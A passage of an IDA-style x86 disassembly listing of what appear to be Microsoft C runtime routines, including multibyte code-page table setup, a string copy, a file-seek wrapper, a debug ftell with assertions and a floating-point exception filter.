dd offset loc_4245AC
dd offset loc_4245B3
dd offset loc_4245BA
byte_4245D4 db 0 ; DATA XREF: sub_424570+21�r
db 3 dup(4)
dd 4040401h, 2 dup(4040404h), 0CC030204h, 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4245F0 proc near ; CODE XREF: sub_4241C0+41�p
; sub_4241C0+31B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_424606
; ---------------------------------------------------------------------------
loc_4245FD: ; CODE XREF: sub_4245F0+29�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_424606: ; CODE XREF: sub_4245F0+B�j
cmp [ebp+var_4], 101h
jge short loc_42461B
mov ecx, [ebp+var_4]
mov byte_492640[ecx], 0
jmp short loc_4245FD
; ---------------------------------------------------------------------------
loc_42461B: ; CODE XREF: sub_4245F0+1D�j
mov dword_492524, 0
mov dword_49253C, 0
mov dword_492744, 0
mov [ebp+var_4], 0
jmp short loc_42464B
; ---------------------------------------------------------------------------
loc_424642: ; CODE XREF: sub_4245F0+6E�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42464B: ; CODE XREF: sub_4245F0+50�j
cmp [ebp+var_4], 6
jge short loc_424660
mov eax, [ebp+var_4]
mov word_492530[eax*2], 0
jmp short loc_424642
; ---------------------------------------------------------------------------
loc_424660: ; CODE XREF: sub_4245F0+5F�j
mov esp, ebp
pop ebp
retn
sub_4245F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424670 proc near ; CODE XREF: sub_4241C0+46�p
; sub_4241C0:loc_424364�p ...
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_418 = byte ptr -418h
var_318 = byte ptr -318h
var_312 = byte ptr -312h
var_304 = byte ptr -304h
var_204 = word ptr -204h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 51Ch
lea eax, [ebp+var_318]
push eax
mov ecx, dword_492524
push ecx
call ds:dword_49447C
cmp eax, 1
jnz loc_4248A9
mov [ebp+var_51C], 0
jmp short loc_4246B1
; ---------------------------------------------------------------------------
loc_4246A2: ; CODE XREF: sub_424670+60�j
mov edx, [ebp+var_51C]
add edx, 1
mov [ebp+var_51C], edx
loc_4246B1: ; CODE XREF: sub_424670+30�j
cmp [ebp+var_51C], 100h
jnb short loc_4246D2
mov eax, [ebp+var_51C]
mov cl, byte ptr [ebp+var_51C]
mov [ebp+eax+var_304], cl
jmp short loc_4246A2
; ---------------------------------------------------------------------------
loc_4246D2: ; CODE XREF: sub_424670+4B�j
mov [ebp+var_304], 20h
lea edx, [ebp+var_312]
mov [ebp+var_4], edx
jmp short loc_4246ED
; ---------------------------------------------------------------------------
loc_4246E4: ; CODE XREF: sub_424670:loc_424736�j
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
loc_4246ED: ; CODE XREF: sub_424670+72�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_424738
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_51C], ecx
jmp short loc_424716
; ---------------------------------------------------------------------------
loc_424707: ; CODE XREF: sub_424670+C4�j
mov edx, [ebp+var_51C]
add edx, 1
mov [ebp+var_51C], edx
loc_424716: ; CODE XREF: sub_424670+95�j
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax+1]
cmp [ebp+var_51C], ecx
ja short loc_424736
mov edx, [ebp+var_51C]
mov [ebp+edx+var_304], 20h
jmp short loc_424707
; ---------------------------------------------------------------------------
loc_424736: ; CODE XREF: sub_424670+B4�j
jmp short loc_4246E4
; ---------------------------------------------------------------------------
loc_424738: ; CODE XREF: sub_424670+86�j
push 0
mov eax, dword_492744
push eax
mov ecx, dword_492524
push ecx
lea edx, [ebp+var_204]
push edx
push 100h
lea eax, [ebp+var_304]
push eax
push 1
call sub_426F40
add esp, 1Ch
push 0
mov ecx, dword_492524
push ecx
push 100h
lea edx, [ebp+var_418]
push edx
push 100h
lea eax, [ebp+var_304]
push eax
push 100h
mov ecx, dword_492744
push ecx
call sub_422F40
add esp, 20h
push 0
mov edx, dword_492524
push edx
push 100h
lea eax, [ebp+var_518]
push eax
push 100h
lea ecx, [ebp+var_304]
push ecx
push 200h
mov edx, dword_492744
push edx
call sub_422F40
add esp, 20h
mov [ebp+var_51C], 0
jmp short loc_4247E9
; ---------------------------------------------------------------------------
loc_4247DA: ; CODE XREF: sub_424670:loc_42489F�j
mov eax, [ebp+var_51C]
add eax, 1
mov [ebp+var_51C], eax
loc_4247E9: ; CODE XREF: sub_424670+168�j
cmp [ebp+var_51C], 100h
jnb loc_4248A4
mov ecx, [ebp+var_51C]
xor edx, edx
mov dx, [ebp+ecx*2+var_204]
and edx, 1
test edx, edx
jz short loc_424846
mov eax, [ebp+var_51C]
mov cl, byte_492641[eax]
or cl, 10h
mov edx, [ebp+var_51C]
mov byte_492641[edx], cl
mov eax, [ebp+var_51C]
mov ecx, [ebp+var_51C]
mov dl, [ebp+ecx+var_418]
mov byte_492540[eax], dl
jmp short loc_42489F
; ---------------------------------------------------------------------------
loc_424846: ; CODE XREF: sub_424670+19E�j
mov eax, [ebp+var_51C]
xor ecx, ecx
mov cx, [ebp+eax*2+var_204]
and ecx, 2
test ecx, ecx
jz short loc_424892
mov edx, [ebp+var_51C]
mov al, byte_492641[edx]
or al, 20h
mov ecx, [ebp+var_51C]
mov byte_492641[ecx], al
mov edx, [ebp+var_51C]
mov eax, [ebp+var_51C]
mov cl, [ebp+eax+var_518]
mov byte_492540[edx], cl
jmp short loc_42489F
; ---------------------------------------------------------------------------
loc_424892: ; CODE XREF: sub_424670+1EB�j
mov edx, [ebp+var_51C]
mov byte_492540[edx], 0
loc_42489F: ; CODE XREF: sub_424670+1D4�j
; sub_424670+220�j
jmp loc_4247DA
; ---------------------------------------------------------------------------
loc_4248A4: ; CODE XREF: sub_424670+183�j
jmp loc_42496E
; ---------------------------------------------------------------------------
loc_4248A9: ; CODE XREF: sub_424670+20�j
mov [ebp+var_51C], 0
jmp short loc_4248C4
; ---------------------------------------------------------------------------
loc_4248B5: ; CODE XREF: sub_424670:loc_424969�j
mov eax, [ebp+var_51C]
add eax, 1
mov [ebp+var_51C], eax
loc_4248C4: ; CODE XREF: sub_424670+243�j
cmp [ebp+var_51C], 100h
jnb loc_42496E
cmp [ebp+var_51C], 41h
jb short loc_424918
cmp [ebp+var_51C], 5Ah
ja short loc_424918
mov ecx, [ebp+var_51C]
mov dl, byte_492641[ecx]
or dl, 10h
mov eax, [ebp+var_51C]
mov byte_492641[eax], dl
mov ecx, [ebp+var_51C]
add ecx, 20h
mov edx, [ebp+var_51C]
mov byte_492540[edx], cl
jmp short loc_424969
; ---------------------------------------------------------------------------
loc_424918: ; CODE XREF: sub_424670+26B�j
; sub_424670+274�j
cmp [ebp+var_51C], 61h
jb short loc_42495C
cmp [ebp+var_51C], 7Ah
ja short loc_42495C
mov eax, [ebp+var_51C]
mov cl, byte_492641[eax]
or cl, 20h
mov edx, [ebp+var_51C]
mov byte_492641[edx], cl
mov eax, [ebp+var_51C]
sub eax, 20h
mov ecx, [ebp+var_51C]
mov byte_492540[ecx], al
jmp short loc_424969
; ---------------------------------------------------------------------------
loc_42495C: ; CODE XREF: sub_424670+2AF�j
; sub_424670+2B8�j
mov edx, [ebp+var_51C]
mov byte_492540[edx], 0
loc_424969: ; CODE XREF: sub_424670+2A6�j
; sub_424670+2EA�j
jmp loc_4248B5
; ---------------------------------------------------------------------------
loc_42496E: ; CODE XREF: sub_424670:loc_4248A4�j
; sub_424670+25E�j
mov esp, ebp
pop ebp
retn
sub_424670 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword_49253C, 0
jz short loc_424993
mov eax, dword_492524
jmp short loc_424995
; ---------------------------------------------------------------------------
loc_424993: ; CODE XREF: .text:0042498A�j
xor eax, eax
loc_424995: ; CODE XREF: .text:00424991�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249A0 proc near ; CODE XREF: sub_425180+D�p
; sub_425240+F�p ...
push ebp
mov ebp, esp
cmp dword_49378C, 0
jnz short loc_4249C0
push 0FFFFFFFDh
call sub_4241C0
add esp, 4
mov dword_49378C, 1
loc_4249C0: ; CODE XREF: sub_4249A0+A�j
pop ebp
retn
sub_4249A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249D0 proc near ; CODE XREF: sub_41B4D0+41�p
; sub_41B4D0+11B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp dword_49253C, 0
jnz short loc_4249FC
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4191A0
add esp, 0Ch
jmp loc_424AF1
; ---------------------------------------------------------------------------
loc_4249FC: ; CODE XREF: sub_4249D0+11�j
push 19h
call sub_41BC90
add esp, 4
loc_424A06: ; CODE XREF: sub_4249D0:loc_424ABE�j
cmp [ebp+arg_8], 0
jz loc_424AC3
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, byte_492641[eax]
and ecx, 4
test ecx, ecx
jz short loc_424A95
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_8], 0
jnz short loc_424A5A
mov ecx, [ebp+arg_0]
mov byte ptr [ecx-1], 0
jmp short loc_424AC3
; ---------------------------------------------------------------------------
loc_424A5A: ; CODE XREF: sub_4249D0+7F�j
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
test ecx, ecx
jnz short loc_424A93
mov ecx, [ebp+arg_0]
mov byte ptr [ecx-2], 0
jmp short loc_424AC3
; ---------------------------------------------------------------------------
loc_424A93: ; CODE XREF: sub_4249D0+B8�j
jmp short loc_424ABE
; ---------------------------------------------------------------------------
loc_424A95: ; CODE XREF: sub_4249D0+5D�j
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
test eax, eax
jnz short loc_424ABE
jmp short loc_424AC3
; ---------------------------------------------------------------------------
loc_424ABE: ; CODE XREF: sub_4249D0:loc_424A93�j
; sub_4249D0+EA�j
jmp loc_424A06
; ---------------------------------------------------------------------------
loc_424AC3: ; CODE XREF: sub_4249D0+3A�j
; sub_4249D0+88�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
sub ecx, 1
mov [ebp+arg_8], ecx
test eax, eax
jz short loc_424AE4
mov edx, [ebp+arg_0]
mov byte ptr [edx], 0
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_424AC3
; ---------------------------------------------------------------------------
loc_424AE4: ; CODE XREF: sub_4249D0+101�j
push 19h
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
loc_424AF1: ; CODE XREF: sub_4249D0+27�j
mov esp, ebp
pop ebp
retn
sub_4249D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B00 proc near ; CODE XREF: sub_41B840+10E�p
; sub_41E810+216�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_424B31
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_424B4C
loc_424B31: ; CODE XREF: sub_424B00+D�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_424B7E
; ---------------------------------------------------------------------------
loc_424B4C: ; CODE XREF: sub_424B00+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_424B90
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_428150
add esp, 4
mov eax, [ebp+var_4]
loc_424B7E: ; CODE XREF: sub_424B00+4A�j
mov esp, ebp
pop ebp
retn
sub_424B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B90 proc near ; CODE XREF: sub_421F20+40D�p
; sub_422400+50�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push eax
call sub_427F40
add esp, 4
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_424BBE
call sub_422F20
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_424C3E
; ---------------------------------------------------------------------------
loc_424BBE: ; CODE XREF: sub_424B90+19�j
mov ecx, [ebp+arg_8]
push ecx
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_C]
push eax
call ds:dword_494318
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_424BE6
call ds:dword_4942F0
mov [ebp+var_4], eax
jmp short loc_424BED
; ---------------------------------------------------------------------------
loc_424BE6: ; CODE XREF: sub_424B90+49�j
mov [ebp+var_4], 0
loc_424BED: ; CODE XREF: sub_424B90+54�j
cmp [ebp+var_4], 0
jz short loc_424C04
mov ecx, [ebp+var_4]
push ecx
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_424C3E
; ---------------------------------------------------------------------------
loc_424C04: ; CODE XREF: sub_424B90+61�j
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
mov dl, [ecx+eax+4]
and dl, 0FDh
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov eax, dword_492420[eax*4]
mov [eax+ecx+4], dl
mov eax, [ebp+var_8]
loc_424C3E: ; CODE XREF: sub_424B90+29�j
; sub_424B90+72�j
mov esp, ebp
pop ebp
retn
sub_424B90 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_424C57: ; CODE XREF: .text:00424C7F�j
cmp dword ptr [ebp+8], 0
jnz short loc_424C7B
push offset aStreamNull ; "stream != NULL"
push 0
push 32h
push offset aFtell_c ; "ftell.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_424C7B
int 3 ; Trap to Debugger
loc_424C7B: ; CODE XREF: .text:00424C5B�j
; .text:00424C78�j
xor eax, eax
test eax, eax
jnz short loc_424C57
mov ecx, [ebp+8]
push ecx
call sub_421230
add esp, 4
mov edx, [ebp+8]
push edx
call sub_424CC0
add esp, 4
mov [ebp-4], eax
mov eax, [ebp+8]
push eax
call sub_4212A0
add esp, 4
mov eax, [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424CC0 proc near ; CODE XREF: sub_41B840+87�p
; .text:00424C91�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
loc_424CC9: ; CODE XREF: sub_424CC0+31�j
cmp [ebp+arg_0], 0
jnz short loc_424CED
push offset aStrNull ; "str != NULL"
push 0
push 63h
push offset aFtell_c ; "ftell.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_424CED
int 3 ; Trap to Debugger
loc_424CED: ; CODE XREF: sub_424CC0+D�j
; sub_424CC0+2A�j
xor eax, eax
test eax, eax
jnz short loc_424CC9
mov ecx, [ebp+arg_0]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
mov eax, [edx+10h]
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+4], 0
jge short loc_424D15
mov edx, [ebp+var_C]
mov dword ptr [edx+4], 0
loc_424D15: ; CODE XREF: sub_424CC0+49�j
push 1
push 0
mov eax, [ebp+var_8]
push eax
call sub_424B00
add esp, 0Ch
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jge short loc_424D36
or eax, 0FFFFFFFFh
jmp loc_424F53
; ---------------------------------------------------------------------------
loc_424D36: ; CODE XREF: sub_424CC0+6C�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jnz short loc_424D56
mov eax, [ebp+var_C]
mov ecx, [ebp+var_1C]
sub ecx, [eax+4]
mov eax, ecx
jmp loc_424F53
; ---------------------------------------------------------------------------
loc_424D56: ; CODE XREF: sub_424CC0+84�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_C]
mov ecx, [edx]
sub ecx, [eax+8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
and eax, 3
test eax, eax
jz short loc_424DCC
mov ecx, [ebp+var_8]
sar ecx, 5
mov edx, [ebp+var_8]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 80h
test ecx, ecx
jz short loc_424DCA
mov edx, [ebp+var_C]
mov eax, [edx+8]
mov [ebp+var_4], eax
jmp short loc_424DAA
; ---------------------------------------------------------------------------
loc_424DA1: ; CODE XREF: sub_424CC0:loc_424DC8�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_424DAA: ; CODE XREF: sub_424CC0+DF�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
cmp eax, [edx]
jnb short loc_424DCA
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Ah
jnz short loc_424DC8
mov eax, [ebp+var_18]
add eax, 1
mov [ebp+var_18], eax
loc_424DC8: ; CODE XREF: sub_424CC0+FD�j
jmp short loc_424DA1
; ---------------------------------------------------------------------------
loc_424DCA: ; CODE XREF: sub_424CC0+D4�j
; sub_424CC0+F2�j
jmp short loc_424DEF
; ---------------------------------------------------------------------------
loc_424DCC: ; CODE XREF: sub_424CC0+AF�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jnz short loc_424DEF
call sub_422F20
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp loc_424F53
; ---------------------------------------------------------------------------
loc_424DEF: ; CODE XREF: sub_424CC0:loc_424DCA�j
; sub_424CC0+11A�j
cmp [ebp+var_1C], 0
jnz short loc_424DFD
mov eax, [ebp+var_18]
jmp loc_424F53
; ---------------------------------------------------------------------------
loc_424DFD: ; CODE XREF: sub_424CC0+133�j
mov eax, [ebp+var_C]
mov ecx, [eax+0Ch]
and ecx, 1
test ecx, ecx
jz loc_424F4D
mov edx, [ebp+var_C]
cmp dword ptr [edx+4], 0
jnz short loc_424E23
mov [ebp+var_18], 0
jmp loc_424F4D
; ---------------------------------------------------------------------------
loc_424E23: ; CODE XREF: sub_424CC0+155�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_C]
mov edx, [eax]
sub edx, [ecx+8]
mov eax, [ebp+var_C]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_10], ecx
mov edx, [ebp+var_8]
sar edx, 5
mov eax, [ebp+var_8]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
movsx edx, byte ptr [ecx+eax+4]
and edx, 80h
test edx, edx
jz loc_424F44
push 2
push 0
mov eax, [ebp+var_8]
push eax
call sub_424B00
add esp, 0Ch
cmp eax, [ebp+var_1C]
jnz short loc_424ED0
mov ecx, [ebp+var_C]
mov edx, [ecx+8]
add edx, [ebp+var_10]
mov [ebp+var_14], edx
mov eax, [ebp+var_C]
mov ecx, [eax+8]
mov [ebp+var_4], ecx
jmp short loc_424E97
; ---------------------------------------------------------------------------
loc_424E8E: ; CODE XREF: sub_424CC0:loc_424EB3�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_424E97: ; CODE XREF: sub_424CC0+1CC�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_14]
jnb short loc_424EB5
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Ah
jnz short loc_424EB3
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_424EB3: ; CODE XREF: sub_424CC0+1E8�j
jmp short loc_424E8E
; ---------------------------------------------------------------------------
loc_424EB5: ; CODE XREF: sub_424CC0+1DD�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 2000h
test edx, edx
jz short loc_424ECE
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_424ECE: ; CODE XREF: sub_424CC0+203�j
jmp short loc_424F44
; ---------------------------------------------------------------------------
loc_424ED0: ; CODE XREF: sub_424CC0+1B5�j
push 0
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_8]
push edx
call sub_424B00
add esp, 0Ch
cmp [ebp+var_10], 200h
ja short loc_424F10
mov eax, [ebp+var_C]
mov ecx, [eax+0Ch]
and ecx, 8
test ecx, ecx
jz short loc_424F10
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
and eax, 400h
test eax, eax
jnz short loc_424F10
mov [ebp+var_10], 200h
jmp short loc_424F19
; ---------------------------------------------------------------------------
loc_424F10: ; CODE XREF: sub_424CC0+229�j
; sub_424CC0+236�j ...
mov ecx, [ebp+var_C]
mov edx, [ecx+18h]
mov [ebp+var_10], edx
loc_424F19: ; CODE XREF: sub_424CC0+24E�j
mov eax, [ebp+var_8]
sar eax, 5
mov ecx, [ebp+var_8]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 4
test eax, eax
jz short loc_424F44
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_424F44: ; CODE XREF: sub_424CC0+19C�j
; sub_424CC0:loc_424ECE�j ...
mov edx, [ebp+var_1C]
sub edx, [ebp+var_10]
mov [ebp+var_1C], edx
loc_424F4D: ; CODE XREF: sub_424CC0+148�j
; sub_424CC0+15E�j
mov eax, [ebp+var_1C]
add eax, [ebp+var_18]
loc_424F53: ; CODE XREF: sub_424CC0+71�j
; sub_424CC0+91�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_424CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424F60 proc near ; CODE XREF: sub_41B970+144�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
call sub_41FA10
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [eax+50h]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_425120
add esp, 8
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_424F93
mov eax, [ebp+var_10]
cmp dword ptr [eax+8], 0
jnz short loc_424FA2
loc_424F93: ; CODE XREF: sub_424F60+28�j
mov ecx, [ebp+arg_4]
push ecx
call ds:dword_494488
jmp loc_42511A
; ---------------------------------------------------------------------------
loc_424FA2: ; CODE XREF: sub_424F60+31�j
mov edx, [ebp+var_10]
cmp dword ptr [edx+8], 5
jnz short loc_424FBF
mov eax, [ebp+var_10]
mov dword ptr [eax+8], 0
mov eax, 1
jmp loc_42511A
; ---------------------------------------------------------------------------
loc_424FBF: ; CODE XREF: sub_424F60+49�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+8], 1
jnz short loc_424FD0
or eax, 0FFFFFFFFh
jmp loc_42511A
; ---------------------------------------------------------------------------
loc_424FD0: ; CODE XREF: sub_424F60+66�j
mov edx, [ebp+var_10]
mov eax, [edx+8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+54h]
mov [ebp+var_18], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
mov [eax+54h], ecx
mov edx, [ebp+var_10]
cmp dword ptr [edx+4], 8
jnz loc_4250F7
mov eax, dword_443648
mov [ebp+var_14], eax
jmp short loc_42500B
; ---------------------------------------------------------------------------
loc_425002: ; CODE XREF: sub_424F60+D0�j
mov ecx, [ebp+var_14]
add ecx, 1
mov [ebp+var_14], ecx
loc_42500B: ; CODE XREF: sub_424F60+A0�j
mov edx, dword_443648
add edx, dword_44364C
cmp [ebp+var_14], edx
jge short loc_425032
mov eax, [ebp+var_14]
imul eax, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ecx+50h]
mov dword ptr [edx+eax+8], 0
jmp short loc_425002
; ---------------------------------------------------------------------------
loc_425032: ; CODE XREF: sub_424F60+BA�j
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C000008Eh
jnz short loc_425055
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 83h
jmp loc_4250DD
; ---------------------------------------------------------------------------
loc_425055: ; CODE XREF: sub_424F60+E4�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx], 0C0000090h
jnz short loc_42506C
mov edx, [ebp+var_8]
mov dword ptr [edx+58h], 81h
jmp short loc_4250DD
; ---------------------------------------------------------------------------
loc_42506C: ; CODE XREF: sub_424F60+FE�j
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0C0000091h
jnz short loc_425083
mov ecx, [ebp+var_8]
mov dword ptr [ecx+58h], 84h
jmp short loc_4250DD
; ---------------------------------------------------------------------------
loc_425083: ; CODE XREF: sub_424F60+115�j
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C0000093h
jnz short loc_42509A
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 85h
jmp short loc_4250DD
; ---------------------------------------------------------------------------
loc_42509A: ; CODE XREF: sub_424F60+12C�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx], 0C000008Dh
jnz short loc_4250B1
mov edx, [ebp+var_8]
mov dword ptr [edx+58h], 82h
jmp short loc_4250DD
; ---------------------------------------------------------------------------
loc_4250B1: ; CODE XREF: sub_424F60+143�j
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0C000008Fh
jnz short loc_4250C8
mov ecx, [ebp+var_8]
mov dword ptr [ecx+58h], 86h
jmp short loc_4250DD
; ---------------------------------------------------------------------------
loc_4250C8: ; CODE XREF: sub_424F60+15A�j
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C0000092h
jnz short loc_4250DD
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 8Ah
loc_4250DD: ; CODE XREF: sub_424F60+F0�j
; sub_424F60+10A�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+58h]
push edx
push 8
call [ebp+var_4]
add esp, 8
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+58h], ecx
jmp short loc_42510E
; ---------------------------------------------------------------------------
loc_4250F7: ; CODE XREF: sub_424F60+92�j
mov edx, [ebp+var_10]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_10]
mov ecx, [eax+4]
push ecx
call [ebp+var_4]
add esp, 4
loc_42510E: ; CODE XREF: sub_424F60+195�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_18]
mov [edx+54h], eax
or eax, 0FFFFFFFFh
loc_42511A: ; CODE XREF: sub_424F60+3D�j
; sub_424F60+5A�j ...
mov esp, ebp
pop ebp
retn
sub_424F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425120 proc near ; CODE XREF: sub_424F60+19�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
